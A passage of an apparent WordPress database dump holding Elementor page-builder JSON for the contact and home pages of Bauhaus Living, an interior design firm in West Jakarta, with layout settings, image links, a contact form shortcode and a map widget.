Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4142,4909,'_elementor_page_assets','a:0:{}'),(4143,4909,'_elementor_pro_version','3.8.1'),(4144,4910,'_wp_page_template','elementor_header_footer'),(4145,4910,'_elementor_edit_mode','builder'),(4146,4910,'_elementor_template_type','wp-page'),(4147,4910,'_elementor_version','3.8.1'),(4148,4910,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4149,4910,'_elementor_page_assets','a:0:{}'),(4150,4910,'_elementor_pro_version','3.8.1'),(4151,4911,'_wp_page_template','elementor_header_footer'),(4152,4911,'_elementor_edit_mode','builder'),(4153,4911,'_elementor_template_type','wp-page'),(4154,4911,'_elementor_version','3.8.1'),(4155,4911,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\